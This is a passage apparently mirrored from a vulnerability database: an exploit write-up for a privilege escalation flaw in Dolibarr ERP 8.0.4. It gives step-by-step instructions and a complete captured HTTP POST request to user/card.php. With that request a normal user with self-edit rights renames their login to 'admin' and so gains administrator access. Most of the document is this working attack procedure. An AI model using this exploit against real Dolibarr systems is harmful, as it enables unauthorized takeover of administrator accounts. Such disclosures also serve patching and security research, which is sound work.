Vulners
Lucene search
Dolibarr 8.0.4 - user privilege escalation Vulnerability
#################################################################################################
# Exploit title : Dolibarr 8.0.4 - user privilege escalation
# Google Dork : N/A
# Date : 06.02.2019
# Exploit Author : Mikayıl İlyas / Cyber-warrior.org - Bug Researchers group
# Vendor Homepage : https://dolibarr.org
# Software download : https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/
# Version : 8.0.4
# Tested on : Windows 7
# CVE :
# Vulnerability Type : user privilege escalation
#################################################################################################
# Step by Step to vulnerable
Hello friends. This security vulnerability is available in version 8.0.4 of the Dolibarr software. It is very simple to use. First, let's set up our Dolibarr script for testing. After making all adjustments, create a new user from the Dolibarr management panel.
Screenshots: https://i.hizliresim.com/bVVr00.png
# Then let's give the "Create / modify your own user information" and "Change own password" permissions to the Normal user we created.
Screenshot: https://i.hizliresim.com/Wqq0vE.png
# Let's login to the system with the new user.
Screenshot: https://i.hizliresim.com/YQQD7a.png
# Yes, we did this. Now click on the user panel.
Screenshot: https://i.hizliresim.com/166LRD.png
# After entering the user panel, click "Change" button.
Screenshot: https://i.hizliresim.com/XMM056.png
# Now let's run the Burp suite software and set the proxy.
Screenshot 1: https://i.hizliresim.com/DYYPN6.png
Screenshot 2: https://i.hizliresim.com/Emmga8.png
# Yes friends. After that, let's make a change in our user panel and save it.
Screenshot: https://i.hizliresim.com/JZZaRQ.png
localhost request:
POST /dolibarr/user/card.php?id=4 HTTP/1.1
Host: localhost:85
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:85/dolibarr/user/card.php?id=4&action=edit
Content-Type: multipart/form-data; boundary=---------------------------257512254329775
Content-Length: 3798
Connection: close
Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=65etle371s4vhk8tu3d7vk2qr0
Upgrade-Insecure-Requests: 1
-----------------------------257512254329775
Content-Disposition: form-data; name="token"
$2y$10$xmymxx24s8wDTbPm8oIY8uleEK7DFsPwekUdPhanpSDg/UvC.nbKS
-----------------------------257512254329775
Content-Disposition: form-data; name="action"
update
-----------------------------257512254329775
Content-Disposition: form-data; name="entity"
1
-----------------------------257512254329775
Content-Disposition: form-data; name="lastname"
test user
-----------------------------257512254329775
Content-Disposition: form-data; name="firstname"
user test
-----------------------------257512254329775
Content-Disposition: form-data; name="login"
test_user
-----------------------------257512254329775
Content-Disposition: form-data; name="password"
-----------------------------257512254329775
Content-Disposition: form-data; name="admin"
0
-----------------------------257512254329775
Content-Disposition: form-data; name="superadmin"
0
-----------------------------257512254329775
Content-Disposition: form-data; name="gender"
-1
-----------------------------257512254329775
Content-Disposition: form-data; name="employee"
1
-----------------------------257512254329775
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------257512254329775
Content-Disposition: form-data; name="address"
CW
-----------------------------257512254329775
Content-Disposition: form-data; name="zipcode"
-----------------------------257512254329775
Content-Disposition: form-data; name="town"
-----------------------------257512254329775
Content-Disposition: form-data; name="country_id"
0
-----------------------------257512254329775
Content-Disposition: form-data; name="state_id"
0
-----------------------------257512254329775
Content-Disposition: form-data; name="office_phone"
-----------------------------257512254329775
Content-Disposition: form-data; name="user_mobile"
-----------------------------257512254329775
Content-Disposition: form-data; name="office_fax"
-----------------------------257512254329775
Content-Disposition: form-data; name="email"
-----------------------------257512254329775
Content-Disposition: form-data; name="accountancy_code"
-----------------------------257512254329775
Content-Disposition: form-data; name="color"
-----------------------------257512254329775
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------257512254329775
Content-Disposition: form-data; name="signature"
-----------------------------257512254329775
Content-Disposition: form-data; name="job"
-----------------------------257512254329775
Content-Disposition: form-data; name="weeklyhours"
-----------------------------257512254329775
Content-Disposition: form-data; name="dateemployment"
-----------------------------257512254329775
Content-Disposition: form-data; name="dateemploymentday"
-----------------------------257512254329775
Content-Disposition: form-data; name="dateemploymentmonth"
-----------------------------257512254329775
Content-Disposition: form-data; name="dateemploymentyear"
-----------------------------257512254329775
Content-Disposition: form-data; name="birth"
-----------------------------257512254329775
Content-Disposition: form-data; name="birthday"
-----------------------------257512254329775
Content-Disposition: form-data; name="birthmonth"
-----------------------------257512254329775
Content-Disposition: form-data; name="birthyear"
-----------------------------257512254329775
Content-Disposition: form-data; name="save"
Kaydet
-----------------------------257512254329775--
# Now we do "normal_user" / change the username to "admin".
Screenshot 1: https://i.hizliresim.com/lqqWzQ.png
Screenshot 2: https://i.hizliresim.com/bVVGQm.png
# After you do this, you will see a notification in the User panel that says "Your user name has been changed."
And by checkout. "admin" password in the user name "normal user name you enter the password".
Screenshot 1: https://i.hizliresim.com/nQQWkB.png
That's it.
more detailed :
See you...
# 0day.today [2019-02-25] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2019 00:00Current
0.5Low risk
Vulners AI Score0.5